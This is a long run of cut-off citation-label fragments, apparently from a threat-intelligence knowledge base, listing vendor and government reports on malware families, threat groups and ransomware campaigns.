ation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CISA M
up Fivehands June 2021),(Citation: Unit42 Agrius 2023),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Trend Micro Trickbot No
MacOS April 2018),(Citation: Red Canary NETWIRE January 2020),(Citation: objsee mac malware 2017),(Citation: Infoblox Lokibot January 2

it 42 Gorgon Group Aug 2018),(Citation: ESET InvisiMole June 2020),(Citation: Talos Promethium June 2020),(Citation: GitHub SILENTTRINI

October 2022),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: ESET EvasivePanda 2024),(Citation: SecureWorks BRONZ
lthcare October 2020),(Citation: Trend Micro Skidmap),(Citation: Arxiv Avaddon Feb 2021),(Citation: Novetta Blockbuster),(Citation: Cobal

suky Sept 2013),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Unit 42 OilRig Sept 2018),(Citation: DOJ GRU Indictment Ju

et Mimic Jan 2016),(Citation: Novetta-Axiom),(Citation: Cybereason Kimsuky November 2020),(Citation: 20 macOS Common Tools and Tech

Nov 2017),(Citation: Trend Micro Skidmap),(Citation: Volexity OceanLotus Nov 2017),(Citation: BlackBerry CostaRicto November 2020),(Ci
February 2021),(Citation: Fortinet Diavol July 2021),(Citation: CarbonBlack Conti July 2020),(Citation: Trend Micro Ransomware Spotlight Pl

Citation: ESET Machete July 2019),(Citation: Unit42 BabyShark Apr 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ESET Casbaneir
Crashoverride 2018),(Citation: Costa AvosLocker May 2022),(Citation: Sophos Netwalker May 2020),(Citation: University of Birmingham C

elium Toolset May 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Google Election Threats October 2020),(Citation: Check

e HuntReport 2022),(Citation: Unit 42 Hildegard Malware),(Citation: Zscaler Higaisa 2020),(Citation: FireEye KEGTAP SINGLEMALT October
tion: DFIR Report APT35 ProxyShell March 2022),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Kaspersky WIRTE November 20

r 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: McAfee Honeybee),(Citation: ESET ComRAT May 2020),(Citation: Intel 471 REvil Ma

Black Basta June 2022),(Citation: Cylance Dust Storm),(Citation: FireEye HAWKBALL Jun 2019),(Citation: ESET Turla PowerShell May 2019),(

Ransom January 2024),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Talos ZxShell Oct 2014),(Citation: Palo Alto Brute Ratel July 2022),
eader),(Citation: DFIR_Quantum_Ransomware),(Citation: Savill 1999),(Citation: Symantec Buckeye),(Citation: Eset Ramsay May 2020),(Cita

chor December 2019),(Citation: Symantec Remsec IOCs),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Kandji Cuckoo April 202
s November 2021),(Citation: Unit42 OceanLotus 2017),(Citation: RedCanary RaspberryRobin 2022),(Citation: CISA WellMail July 2020),(Cita

7),(Citation: Symantec Tick Apr 2016),(Citation: KISA Operation Muzabi),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CISA

arbon Mar 2017),(Citation: Kaspersky Lab SynAck May 2018),(Citation: CISA EB Aug 2020),(Citation: FireEye SUNBURST Backdoor Decembe
on: Palo Alto Comnie),
persky Lyceum October 2021),(Citation: Talos MuddyWater Jan 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: Bitdefender Sar

2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: Crowdstrike Helix Kitten Nov 2018),
tion: Elastic Pikabot 2024),

(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Trend

Citation: FireEye APT33 Guardrail),(Citation: Anomali Static Kitten February 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: US District

itation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Antiy CERT Ramsay April 2020),(Citation: FireEye WannaCry 2
2022),(Citation: Microsoft Anti Spoofing),(Citation: ACSC Email Spoofing)

ng),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: Talos Kimsuky Nov 2021),(Citation: Crowdstrike Helix Kitten Nov 2
er Bazar September 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: ATT QakBot April 2021),(Citation: Anomali Static Kitte

k Feb 2019),(Citation: FoxIT Wocao December 2019),(Citation: McAfee Gold Dragon),(Citation: Unit 42 Gamaredon February 2022),(Citatio
tation: Kaspersky ShadowPad Aug 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: JPCert BlackTech Malware Septem

t 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: CISA MAR-10292089-1.v2 T

ary NETWIRE January 2020),(Citation: EFF Manul Aug 2016),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Sophos Gootloader),(Cita

017),(Citation: CISA AA21-200A APT40 July 2021),(Citation: FireEye Maze May 2020),(Citation: Trend Micro Cyclops Blink March 2022),
diant Cutting Edge January 2024),(Citation: Crowdstrike DNC June 2016),(Citation: Talos Bisonal Mar 2020),(Citation: Bleeping Computer O

ation: Novetta Blockbuster),(Citation: Microsoft Reg),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Cobalt Strike Manual 4.3 No
r September 2020),(Citation: US-CERT TA18-074A),(Citation: ClearSky Pay2Kitten December 2020),(Citation: SecureWorks August 2019),(C
tion: CrowdStrike StellarParticle January 2022),(Citation: Novetta Blockbuster RATs),(Citation: Novetta Blockbuster),(Citation: Fortinet Diav

1),(Citation: ESET Hermetic Wizard March 2022),(Citation: Symantec Daggerfly 2023),(Citation: Microsoft BlackCat Jun 2022),(Citation: Ncc

2021),(Citation: ESET Carbon Mar 2017),(Citation: emotet_hc3_nov2023),(Citation: FireEye SUNBURST Backdoor December 2020),(Citatio

ecurelist BlackEnergy Nov 2014),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Nccgroup Gh0st April 2018),(Citation: ESET Noma
18-074A),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: SentinelO

OADSWEEP August 2022),(Citation: TrendMicro Netwalker May 2020),(Citation: Qualys Hermetic Wiper March 2022),(Citation: CISA MAR S

ust Storm),(Citation: Kandji Cuckoo April 2024),(Citation: Check Point APT35 CharmPower January 2022),(Citation: MalwareBytes SideCop
TrendMicro RaspberryRobin 2022),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Crowdstrike Qakbot October 2020),(Citati

Wizard March 2022),(Citation: FireEye CARBANAK June 2017),(Citation: Securelist APT10 March 2021),(Citation: SentinelOne Macma 2021)
itation: Cybereason Astaroth Feb 2019),(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Secure Host Basel
erint Qakbot May 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: ATT QakBot April 2021),(Citation: Crowdstrike Qakbot October 202

),(Citation: BlackBerry CostaRicto November 2020),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: MalwareBytes LazyScripter F

zar May 2021),(Citation: Talos Konni May 2017),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Red Canary NETWIRE January 2020),(C

ck Logs October 2023),(Citation: Symantec Buckeye),(Citation: FireEye Clandestine Fox),(Citation: NTT Security Flagpro new December 202
Storm),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye HAWKBALL Jun 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(C

spersky Poseidon Group),(Citation: McAfee Cuba April 2021),(Citation: Microsoft Tasklist),(Citation: CISA AA24-038A PRC Critical Infrastruc

: Trend Micro Iron Tiger April 2021),(Citation: Russinovich Sysinternals),(Citation: McAfee Shamoon December19 2018),(Citation: Cobalt St

t42 Azorult Nov 2018),(Citation: SANS Conficker),(Citation: Trellix Darkgate 2023),(Citation: ESET InvisiMole June 2018),(Citation: GitHub S
tation: FOX-IT May 2016 Mofang),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: Talos Kimsuky Nov 2021),(Citation:

n: Cybereason Bumblebee August 2022),(Citation: ATT QakBot April 2021),(Citation: Anomali Static Kitten February 2021),(Citation: US Dist
tion: Sygnia Emperor Dragonfly October 2022),(Citation: McAfee Night Dragon),(Citation: FireEye FIN6 April 2016),(Citation: FireEye Respo

sky Adwind Feb 2016),(Citation: Malwarebytes DarkComet March 2018),(Citation: Talos PoetRAT April 2020),(Citation: Proofpoint Operatio

itation: Symantec Daggerfly 2024),(Citation: ESET OceanLotus macOS April 2019),(Citation: Unit42 PlugX June 2017),(Citation: GitHub Pupy
endMicro Ursnif File Dec 2014),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: RecordedFuture WhisperGate Jan 2022)

020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: HP RaspberryRobin 2024),(Citation: Bitdefender FIN8 July 2021),(Citation: M
eb 2017),(Citation: Forcepoint Monsoon),(Citation: Unit 42 Nokki Oct 2018),(Citation: ESET Turla PowerShell May 2019),(Citation: FireEye A

),(Citation: Cybereason Soft Cell June 2019),(Citation: Talos Nyetya June 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Fra
n Kimsuky November 2020),(Citation: F-Secure BlackEnergy 2014),(Citation: Mandiant No Easy Breach),(Citation: RedCanary RaspberryRob

ry),(Citation: CrowdStrike BloodHound April 2018),(Citation: Secureworks IRON RITUAL Profile),(Citation: CISA AA20-259A Iran-Based Acto

mantec W32.Duqu),(Citation: CISA SoreFang July 2016),(Citation: Cylance Dust Storm),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien

tion: SecureWorks August 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: StarBlizzard),(Citation: Cisco Operation Layover
spersky ShadowPad Aug 2017),(Citation: BlackBerry CostaRicto November 2020),(Citation: PaloAlto DNS Requests May 2016),(Citation: Co

ation: TrendMicro Taidoor),(Citation: Zscaler Higaisa 2020),(Citation: Juniper IcedID June 2020),(Citation: PTSecurity Cobalt Dec 2016),(Cita

are 2017),(Citation: CISA WellMail July 2020),(Citation: DOJ APT10 Dec 2018),(Citation: Villeneuve 2011),(Citation: Securelist Remexi Jan 20

y CERT Ramsay April 2020),(Citation: ESET InvisiMole June 2018),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Crowdstrike HuntRep

Secret),(Citation: Red Canary NETWIRE January 2020),(Citation: Palo Alto OilRig May 2016),(Citation: TrendMicro Patchwork Dec 2017),(Ci

Double Tap),(Citation: Carbon Black HotCroissant April 2020),(Citation: Mandiant FIN13 Aug 2022),(Citation: Secureworks DarkTortilla Aug
ation: Unit42 Redaman January 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: Securelist Remexi Jan 2019),

: Mandiant ROADSWEEP August 2022),(Citation: CheckPoint Bandook Nov 2020),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Flash

on: Proofpoint TA505 June 2018),(Citation: Prevailion DarkWatchman 2021),(Citation: SentinelOne Gootloader June 2021),(Citation: Morp

ation: Crowdstrike Helix Kitten Nov 2018),(Citation: Symantec Thrip June 2018),(Citation: Kaspersky Poseidon Group),(Citation: DomainToo
Citation: Symantec Seaduke 2015),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Riskiq Remcos Jan 2018),(Citation: Anomali Rocke M
0 macOS Common Tools and Techniques),(Citation: sentinelone shlayer to zshlayer),(Citation: Trend Micro TeamTNT),(Citation: Kandji Cuck
1),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Trend Micro Qakbot May 2020),(Citation: Proofpoint TA459 April 2017),(Citation
9),(Citation: McAfee Gold Dragon),(Citation: Unit 42 Gamaredon February 2022),(Citation: Picus Sodinokibi January 2020),(Citation: ESET L
Empire),(Citation: ESET PipeMon May 2020),(Citation: Symantec Nerex May 2012),(Citation: Symantec Dyre June 2015),(Citation: Joint Cyb
019),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Trellix Darkgate 2023),(Citation: ClearSky Wilted Tulip July 2017),

quid BLUELIGHT August 2021),(Citation: Sekoia Raccoon2 2022),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Symant

ation: Palo Alto Shamoon Nov 2016),(Citation: Check Point Meteor Aug 2021),(Citation: Ready.gov IT DRP)

ation: Prevailion DarkWatchman 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: NTT Security Flagpro new December 2
Cuba April 2021),(Citation: Talos Sodinokibi April 2019),(Citation: Unit42 Xbash Sept 2018),(Citation: CheckPoint Agrius 2023),(Citation: Tre

snif Mar 2015),(Citation: Kandji Cuckoo April 2024),(Citation: Unit42 Agrius 2023),(Citation: Antiy CERT Ramsay April 2020),(Citation: Cylan

(Citation: DOJ APT10 Dec 2018),(Citation: ESET Turla PowerShell May 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation
018),(Citation: Chronicle Winnti for Linux May 2019),(Citation: Talos MuddyWater Jan 2022),(Citation: ESET Dukes October 2019),(Citation

ation: Symantec Patchwork),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Lookout Dark Caracal Jan 2018),(Citation: FireEye APT38 O

(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Invincea XTunnel),(Citation: Github Koadic),(Citation: group-ib_redcurl2),(Citation
0st April 2018),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Proofpoint TA459 April 2017),(Citation: Cisco H1N1 Part 2),(Citation
on: RotaJakiro 2021 netlab360 analysis),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Unit42 RDAT July 2020),(Citati

or Dragonfly October 2022),(Citation: McAfee Night Dragon),(Citation: apt41_dcsocytec_dec2022),(Citation: Microsoft Ransomware as a Se

tion: Gigamon Berserk Bear October 2021),(Citation: Antiy CERT Ramsay April 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation:

reat Report 2021),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET),(Citation: Microsoft Drive

,(Citation: CrowdStrike Scattered Spider BYOVD January 2023),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: M
January 2022),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: OilRig ISMAgent July 2017),(Citation: ESET InvisiM
ation: Trend Micro Trickbot Nov 2018),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Qualys Hermetic Wiper March 2022),(Citation: F
tion: Infoblox Lokibot January 2019),(Citation: TrendMicro macOS Dacls May 2020),(Citation: McAfee Sharpshooter December 2018),(Citati

,(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: ClearSky Wilted Tulip July 2017),

(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Kaspersky LuminousMoth July 2021),(Citation: TrendMicro EarthLusca 2022)
a Blockbuster),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: HP Raspberry

ation: DOJ GRU Indictment Jul 2018),(Citation: Carbon Black HotCroissant April 2020),(Citation: Lumen KVBotnet 2023),(Citation: FOX-IT M

macOS Common Tools and Techniques),(Citation: NCSC Joint Report Public Tools),(Citation: Mandiant Pulse Secure Update May 2021),(Cita

ostaRicto November 2020),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Talos PoetRAT October 2020),(Citation: GitHub Sliv
Micro Ransomware Spotlight Play July 2023),(Citation: CISA Royal AA23-061A March 2023),(Citation: NCC Group WastedLocker June 2020),

017),(Citation: ESET Casbaneiro Oct 2019),(Citation: Kaspersky Darkhotel),(Citation: Cylance Cleaver),(Citation: ESET EvasivePanda 2023),(C
on: University of Birmingham C2),(Citation: Microsoft Preventing SMB)

October 2020),(Citation: Check Point APT34 April 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cylance Dust Storm),(Citation: Secu

KEGTAP SINGLEMALT October 2020),(Citation: Microsoft Win Defender Truvasys Sep 2017),(Citation: Malwarebytes Konni Aug 2021),(Citati
aspersky WIRTE November 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Talos Promethium June 2020),(Citatio

0),(Citation: Intel 471 REvil March 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: CISA AR18-352A Quasar RAT December 2018),(Cita

Turla PowerShell May 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Cybereason INC Ransomware

alo Alto Brute Ratel July 2022),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Kaspersky ProjectSauron Technical Anal
: Eset Ramsay May 2020),(Citation: Cybereason Royal December 2022),(Citation: NTT Security Flagpro new December 2021),(Citation: Arx

ation: Kandji Cuckoo April 2024),(Citation: Kaspersky Turla Penquin December 2014),(Citation: Dell TG-3390),(Citation: Bitdefender Naikon
CISA WellMail July 2020),(Citation: NCSC APT29 July 2020),(Citation: Github Covenant),(Citation: Anomali Rocke March 2019),(Citation: Ta

ovember 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Unit42 Agrius 2023),(Citation: Microsoft NICKEL De

SUNBURST Backdoor December 2020),(Citation: therecord_redcurl),(Citation: Palo Alto Comnie),(Citation: ESET Industroyer),(Citation: Man

022),(Citation: Bitdefender Sardonic Aug 2021),(Citation: FoxIT Wocao December 2019),(Citation: ClearSky MuddyWater June 2019),(Citati

dstrike Helix Kitten Nov 2018),(Citation: Cisco Operation Layover September 2021),(Citation: ESET OceanLotus macOS April 2019),(Citation

AN Aug 2020),(Citation: Trend Micro Daserf Nov 2017),(Citation: Rostovcev APT41 2021),(Citation: Talos Bisonal Mar 2020),(Citation: Black

Oct 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: F-Secure The Dukes),(Citation: Lab52 WIRTE Apr

(Citation: FireEye WannaCry 2017),(Citation: Cybereason INC Ransomware November 2023),(Citation: Proofpoint Operation Transparent T
Crowdstrike Helix Kitten Nov 2018),(Citation: Cisco Operation Layover September 2021),(Citation: Secureworks DarkTortilla Aug 2022),(Cit
),(Citation: Anomali Static Kitten February 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: SentinelO

aredon February 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET LoudMiner June 2019),(Citation: ESET Security Mispadu Face
rt BlackTech Malware September 2019),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Gigamon Berserk Bear October 2021),(Ci

n: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Cobalt Strike Manual 4.3 Nov

tion: Sophos Gootloader),(Citation: Accenture Hogfish April 2018),(Citation: Infoblox Lokibot January 2019),(Citation: Symantec W32.Duqu

yclops Blink March 2022),

Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: Operation Quantum Entanglement),(Citation: CISA AA20-259A Iran-B

n: Cobalt Strike Manual 4.3 November 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET Zebrocy May 2019),(Citation: CISA AA20-2
SecureWorks August 2019),(Citation: GitHub Pupy),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: SentinelOne Agrius 2021)
buster),(Citation: Fortinet Diavol July 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Trend M

ckCat Jun 2022),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CrowdStrike

door December 2020),(Citation: Securelist WhiteBear Aug 2017),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),

ril 2018),(Citation: ESET Nomadic Octopus 2018),(Citation: ESET Machete July 2019),(Citation: SCILabs Malteiro 2021),(Citation: ESET Casba
mber 2020),(Citation: SentinelOne Agrius 2021),(Citation: Unit42 SUPERNOVA Dec 2020),(Citation: Microsoft Albanian Government Attacks

ch 2022),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: TrustedSec OOB Communications)

ation: MalwareBytes SideCopy Dec 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Group IB Ransomware September 20
e Qakbot October 2020),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Trend Micro Skidmap),(Citation: Prevailion Dar

on: SentinelOne Macma 2021),(Citation: Palo Alto menuPass Feb 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Clea
r),(Citation: Secure Host Baseline EMET),(Citation: Beechey 2010),(Citation: Microsoft Windows Defender Application Control),(Citation: C
owdstrike Qakbot October 2020),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: US-CERT BLINDINGCAN Aug 2020),(Cit

n: MalwareBytes LazyScripter Feb 2021),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: SentinelLabs reversing run-only applescri

ary NETWIRE January 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Glitch-Cat Green L

ity Flagpro new December 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: CarbonBlack Conti July 2020),(Citation: ESET Zebrocy May
T35 ProxyShell March 2022),(Citation: Kaspersky WIRTE November 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation

24-038A PRC Critical Infrastructure February 2024),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Palo Alto OilRig May 2016),(C

er19 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: McAfee GhostSecret),(Citation: Microsoft SIR Vol 21),(Citation: S

June 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: BitDefender BADHATCH Mar 2021),(Citation: Trend Micro DRBCo
s Kimsuky Nov 2021),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Cisco Operation Layover September 2021),(Citation: Securewo

bruary 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: DHS/CISA Ransomware Targeting Healthcare
2016),(Citation: FireEye Respond Webinar July 2017),(Citation: Aqua Kinsing April 2020),(Citation: District Court of NY APT10 Indictment De

,(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Machete Mar 2017),(Citation: ESET InvisiMole June 202

e 2017),(Citation: GitHub Pupy),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: HP RaspberryRobin 2024),(Citation: Talos Remcos
Future WhisperGate Jan 2022),(Citation: MDSec Brute Ratel August 2022),(Citation: trendmicro xcsset xcode project 2020),

er FIN8 July 2021),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Anomali Rocke March 2
May 2019),(Citation: FireEye APT17),(Citation: CyberESI GTALK),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Checkpoint IndigoZebra

Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Group IB Ransomwa
tion: RedCanary RaspberryRobin 2022),(Citation: Forcepoint Monsoon),(Citation: Antiy CERT Ramsay April 2020),(Citation: Crowdstrike Ind

SA AA20-259A Iran-Based Actor September 2020),(Citation: US-CERT TA18-074A),(Citation: Kaspersky Poseidon Group),(Citation: SecureW

ere, Liam O Murchu, Eric Chien February 2011),(Citation: Crowdstrike Indrik November 2018),(Citation: group-ib_redcurl2),(Citation: Trend

ation: Cisco Operation Layover September 2021),(Citation: Korean FSI TA505 2020),(Citation: Palo Alto Black-T October 2020),(Citation: Dom
uests May 2016),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: SecureWo

Security Cobalt Dec 2016),(Citation: Unit42 SilverTerrier 2018),(Citation: Chronicle Winnti for Linux May 2019),(Citation: ESET Dukes Octob

ation: Securelist Remexi Jan 2019),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: CheckPoint Naikon May 2020

Citation: Crowdstrike HuntReport 2022),(Citation: FireEye APT37 Feb 2018),(Citation: SOCRadar INC Ransom January 2024),(Citation: objec

Micro Patchwork Dec 2017),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Unit42 Agrius 2023),(Citation: Palo Alto T9000 Feb 2016),(Cita

: Secureworks DarkTortilla Aug 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: McAfee Netwire M
ulip July 2017),(Citation: Flashpoint FIN 7 March 2019),(Citation: Netspi PowerShell Execution Policy Bypass),(Citation: win10_asr),(Citation

er June 2021),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: TrendMicro EarthLusca 2022),(Citation: Symantec Leafminer July 2018

n Group),(Citation: DomainTools WinterVivern 2021),(Citation: Korean FSI TA505 2020),(Citation: Talos Konni May 2017),(Citation: BiZone L
8),(Citation: Anomali Rocke March 2019),(Citation: Talos PoetRAT April 2020),(Citation: Cylance Machete Mar 2017),(Citation: CheckPoint
eamTNT),(Citation: Kandji Cuckoo April 2024),(Citation: NKAbuse SL),(Citation: Talos Rocke August 2018),(Citation: Proofpoint NETWIRE De
int TA459 April 2017),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: SCILabs Malteiro 2021),(Citation: Cybereason Cobalt Kitty 2017)
anuary 2020),(Citation: ESET LoudMiner June 2019),(Citation: FireEye FELIXROOT July 2018),(Citation: Lookout Dark Caracal Jan 2018),(Cita
une 2015),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Dragos Crashoverride 2017),(Citation: U
Tulip July 2017),

ember 2020),(Citation: Symantec Daggerfly 2023),(Citation: ESET Zebrocy May 2019),(Citation: Zscaler APT31 Covid-19 October 2020),(Cita

urity Flagpro new December 2021),(Citation: FireEye CARBANAK June 2017),(Citation: Talos Bisonal Mar 2020),(Citation: Cobalt Strike Man
oint Agrius 2023),(Citation: Trend Micro Cheerscrypt May 2022),(Citation: NCC Group Fivehands June 2021),(Citation: Crowdstrike Indrik N

ay April 2020),(Citation: Cylance Machete Mar 2017),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Mandiant ROADSWEEP August 2

oxyShell March 2022),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: N
Dukes October 2019),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Cit

18),(Citation: FireEye APT38 Oct 2018),(Citation: US-CERT TA18-074A),(Citation: Trendmicro_IcedID),(Citation: Telefonica Snip3 December

n: group-ib_redcurl2),(Citation: Cylance Machete Mar 2017),(Citation: Proofpoint TA505 Jan 2019),(Citation: Dingledine Tor The Second-G
n: Cisco H1N1 Part 2),(Citation: ESET Machete July 2019),(Citation: Lotus Blossom Jun 2015),(Citation: Talos Frankenstein June 2019),(Citati
Unit42 RDAT July 2020),(Citation: BlackBerry Amadey 2020),(Citation: Mandiant FIN12 Oct 2021),(Citation: ESET Gelsemium June 2021),(C

Microsoft Ransomware as a Service),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: SecureWorks BRONZE STARLIGHT R
0A APT40 July 2021),(Citation: FireEye admin@338),(Citation: TrendMicro Sandworm October 2014),(Citation: FireEye APT37 Feb 2018),(Ci

MET),(Citation: Microsoft Driver Block Rules),(Citation: Wikipedia Control Flow Integrity)

pendix Sept 2022),(Citation: Microsoft NICKEL December 2021),(Citation: Microsoft GALLIUM December 2019),(Citation: CISA AA20-296A B
ly 2017),(Citation: ESET InvisiMole June 2020),(Citation: ESET InvisiMole June 2018),(Citation: University of Birmingham C2)
Wiper March 2022),(Citation: FireEye Metamorfo Apr 2018),(Citation: Microsoft Prestige ransomware October 2022),(Citation: ESET Dukes
hooter December 2018),(Citation: Kandji Cuckoo April 2024),(Citation: Talos Rocke August 2018),(Citation: Talos PoetRAT April 2020),(Citati

TrendMicro EarthLusca 2022),(Citation: Securelist APT10 March 2021),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Microsoft SIR Vo
2021),(Citation: HP RaspberryRobin 2024),(Citation: Talos Cobalt Strike September 2020),(Citation: SentinelLabs reversing run-only apples

otnet 2023),(Citation: FOX-IT May 2016 Mofang),(Citation: Talos Kimsuky Nov 2021),(Citation: McAfee GhostSecret),(Citation: ESET OceanL

ecure Update May 2021),(Citation: Cylance Dust Storm),(Citation: Unit42 Agrius 2023),(Citation: ESET Turla PowerShell May 2019),(Citation

er 2020),(Citation: GitHub Sliver Upload),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: MalwareBytes LazyScripter Feb 2021),
up WastedLocker June 2020),(Citation: IBM MegaCortex),(Citation: Palo Alto Networks Black Basta August 2022),(Citation: Talos Sodinokib

n: ESET EvasivePanda 2023),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: FireEye APT34 July 2019),(Citation: DigiTrust Agent Te
nce Dust Storm),(Citation: Securelist Octopus Oct 2018),(Citation: ANSSI RYUK RANSOMWARE),(Citation: Unit42 Agrius 2023),(Citation: Cad

ebytes Konni Aug 2021),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Symantec Catchamas April 2018),(Citation: Morphisec FIN7 Jun
romethium June 2020),(Citation: McAfee Honeybee),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Mandiant APT41),(Citation: E

asar RAT December 2018),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation:

Cybereason INC Ransomware November 2023),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Kaspersky WIRTE November 20

ProjectSauron Technical Analysis),(Citation: FireEye FIN6 April 2016),(Citation: Securelist DarkVishnya Dec 2018),(Citation: SentinelOne IN
